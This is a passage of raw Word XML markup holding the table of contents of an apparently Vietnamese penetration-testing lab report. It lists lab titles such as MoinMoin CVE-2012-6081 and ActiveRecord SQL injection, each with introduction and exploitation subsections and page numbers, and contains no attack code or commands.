          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FABD35" w14:textId="423FA30C" w:rsidR="00F75BCC" w:rsidRPr="00F12C2B" w:rsidRDefault="00F75BCC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LAB 3:</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2470" w:rsidRPr="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PLAY SESSION INJECTION</w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939A000" w14:textId="3D67A588" w:rsidR="00F75BCC" w:rsidRPr="00F12C2B" w:rsidRDefault="00F75BCC"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3.1</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC02AE" w14:textId="4C4635D6" w:rsidR="00332B32" w:rsidRPr="00F12C2B" w:rsidRDefault="00332B32" w:rsidP="00283404">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00896403" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720FC03" w14:textId="3150CAF6" w:rsidR="00332B32" w:rsidRPr="00F12C2B" w:rsidRDefault="00F82965" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2470" w:rsidRPr="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web for Pentester II</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770B077" w14:textId="71BF0DD6" w:rsidR="00332B32" w:rsidRPr="00F12C2B" w:rsidRDefault="00F82965" w:rsidP="00283404">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EB9F7" w14:textId="37719187" w:rsidR="00FF2825" w:rsidRPr="00F12C2B" w:rsidRDefault="00F82965" w:rsidP="00283404">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00332B32" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A138C8" w14:textId="51B42120" w:rsidR="009F3F89" w:rsidRDefault="00F82965" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="009F3F89" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2470" w:rsidRPr="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Wordpress 2.5 Cookie Integrity Protection Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="009F3F89" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812358F" w14:textId="502128CA" w:rsidR="00DA0621"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5</w:t>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D217DCA" w14:textId="2006438F" w:rsidR="00DA0621" w:rsidRPr="00F12C2B"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5</w:t>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2. Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00DA0621">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545BD5C4" w14:textId="435705DC" w:rsidR="00DA5B32" w:rsidRPr="00DA5B32" w:rsidRDefault="00F82965" w:rsidP="00DA5B32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="009F3F89" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DA5B32" w:rsidRPr="00DA5B32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CVE-2012-6081: MoinMoin code execution</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C3AC2" w14:textId="1F2C97C9" w:rsidR="001259E1"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6</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="009F3F89" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2A055" w14:textId="31E5F9E0"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6</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2. Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC1F5D" w14:textId="1BB5359B"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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0" w:rsidRPr="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. LAB 8: Linux Host Review</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7DDC50" w14:textId="60662B58"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7</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC488D" w14:textId="6F07A1ED"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7</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2. Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE6CDA2" w14:textId="19F49DB6"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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0" w:rsidRPr="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. LAB 9: CVE-2012-2661: ActiveRecord SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46353C92" w14:textId="02F93A02"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8</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C1D19" w14:textId="77B5CD6A"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8</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2. Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7F536" w14:textId="68E7143D"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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0" w:rsidRPr="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. LAB 10: Rack Cookies and Commands injection</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D2122" w14:textId="1CF8BD3F" w:rsidR="00405BA0"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9</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1 Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE1693" w14:textId="23C2FE65" w:rsidR="00405BA0" w:rsidRPr="00F12C2B" w:rsidRDefault="00F82965" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2 Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00405BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
